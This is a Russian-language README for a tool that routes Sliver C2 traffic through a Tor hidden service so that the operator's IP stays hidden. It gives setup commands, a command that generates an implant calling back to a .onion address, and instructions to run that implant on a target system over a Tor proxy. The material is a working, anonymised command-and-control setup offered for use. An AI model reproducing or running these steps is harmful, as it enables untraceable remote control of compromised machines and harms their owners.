
Tor транспортный мост для Sliver C2 - анонимное управление и контроль
Транспортный мост на основе Tor для Sliver C2. Создает скрытый сервис и проксирует трафик к вашему серверу Sliver, так что ваш реальный IP-адрес никогда не раскрывается.
Настраивает скрытый сервис Tor, который указывает на локальный HTTP-прокси. Прокси перенаправляет всё на HTTPS-слушатель Sliver. Импланты подключаются через Tor, вы управляете ими обычным образом через Sliver.
sliver server <---> proxy <---> tor hidden service <---> implant
:8443 :8080 xyz.onion (via tor)
git clone https://github.com/Otsmane-Ahmed/sliver-tor-bridge.git
cd sliver-tor-bridge
python3 -m venv venv
source venv/bin/activate
pip install -e .
Запустите Sliver с HTTPS-слушателем:
sliver-client
sliver > https -L 127.0.0.1 -l 8443
В другом терминале запустите мост:
sudo systemctl stop tor
sliver-tor-bridge start --sliver-port 8443
Вывод будет выглядеть примерно так:
[+] Tor started successfully!
[+] Hidden Service: http://abc123xyz.onion
[+] Bridge is READY!
Дождитесь .onion-адреса, затем создайте имплант:
sliver > generate --http http://abc123xyz.onion --os linux --save /tmp/implant
Запустите имплант на целевой системе (требуется Tor):
HTTP_PROXY=socks5h://127.0.0.1:9050 ./implant
sliver-tor-bridge start [OPTIONS]
--sliver-port порт HTTPS Sliver (по умолчанию 8443)
--tor-port порт SOCKS Tor (по умолчанию 9050)
--service-port порт скрытого сервиса (по умолчанию 80)
-c, --config путь к файлу конфигурации
Другие команды:
sliver-tor-bridge status # проверить, запущен ли скрытый сервис
sliver-tor-bridge stop # очистить каталог скрытого сервиса
graph LR
Implant[Implant] -->|Tor Network| HS["Hidden Service (.onion)"]
HS -->|TCP :8080| Proxy["Bridge Proxy"]
Proxy -->|HTTPS :8443| Sliver["Sliver Server"]
Мост находится посередине и ретранслирует трафик. Sliver считает, что получает обычные HTTPS-соединения. Имплант думает, что общается с обычным HTTP-сервером.
docker-compose up -d
docker-compose logs -f
pip install pytest
pytest tests/
sliver_tor_bridge/
cli.py # интерфейс командной строки
tor_manager.py # запускает Tor и создает скрытый сервис
proxy.py # приложение Flask, перенаправляющее запросы на Sliver
config.py # обработка конфигурации
Tor не запускается: убедитесь, что системный Tor остановлен (sudo systemctl stop tor)
Тайм-аут соединения: начальная загрузка Tor может занять 1–3 минуты, дождитесь 100%
Имплант не подключается: убедитесь, что у импланта есть доступ к Tor (SOCKS-прокси на порту 9050)
mit